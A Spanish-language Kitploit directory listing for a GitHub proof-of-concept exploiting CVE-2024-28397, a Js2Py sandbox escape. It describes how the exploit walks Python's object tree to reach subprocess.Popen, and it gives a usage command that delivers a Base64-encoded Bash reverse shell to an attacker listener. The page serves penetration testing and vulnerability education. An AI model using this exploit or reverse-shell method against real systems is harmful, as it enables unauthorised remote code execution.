Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-28397-Js2Py-RCE — Este repositorio contiene una prueba de concepto (PoC) para CVE-2024-28397, una vulnerabilidad en la librería js2py que permite un escape de la sandbox para lograr ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Este repositorio contiene una prueba de concepto (PoC) para CVE-2024-28397, una vulnerabilidad en la librería js2py que permite un escape de la sandbox para lograr ejecución remota de código.

Ver Repositorio
2hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-28397-Js2Py-RCE

Descripción

Este repositorio contiene una Prueba de Concepto (PoC) basada en Python para CVE-2024-28397, una vulnerabilidad de escape de sandbox en el intérprete de JavaScript Js2Py para Python. Cuando la aplicación objetivo evalúa código JS no confiable mediante Js2Py, un atacante puede escapar del sandbox y ejecutar código Python arbitrario. Esto puede aprovecharse para lograr ejecución remota de código (RCE) y una reverse shell en el sistema vulnerable.

Este exploit fue inspirado por el proyecto CVE-2024-28397-js2py-Sandbox-Escape de Marven11.


Descargo de responsabilidad

Este script se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. El uso no autorizado de este script contra sistemas que no posees o para los cuales no tienes permiso explícito de prueba es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este script.


Acerca de la vulnerabilidad

  • ID de CVE: CVE-2024-28397
  • Componente: Escape de sandbox de Js2Py
  • Impacto: Acceso sin restricciones al modelo de objetos de Python mediante __class__.__base__.__subclasses__, lo que lleva a la ejecución de código arbitrario
  • Vector de ataque: Remoto (a través de una interfaz HTTP expuesta que evalúa JavaScript controlado por el usuario)

Características

  • Entrega automática del payload de reverse shell mediante RCE en Python
  • Ejecución de comandos de shell codificados en Base64 en línea
  • Listener de reverse shell integrado con estabilización básica de PTY
  • Formato de salida limpio
  • Ligero y sin dependencias (excepto requests)

Requisitos

  • Python 3.x
  • Módulo requests (pip install requests)
  • Un sistema Linux (para la reverse shell /dev/tcp)
  • Un objetivo que ejecute una implementación vulnerable de Js2Py

Uso

root@kitploit:~
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target: La URL completa del endpoint de la aplicación web vulnerable
  • --lhost: Tu dirección IP local (usada para la reverse shell)
  • --lport: Tu puerto local para recibir la shell

Cómo funciona

  1. El script prepara una reverse shell de Bash, la codifica en Base64 y la inyecta en un payload de JavaScript.
  2. El payload de JS recorre el árbol de objetos de Python usando __class__.__base__.__subclasses__() para encontrar subprocess.Popen.
  3. Usa Popen para decodificar y ejecutar la shell.
  4. La máquina del atacante recibe la reverse shell y la estabiliza automáticamente.
Descargar herramienta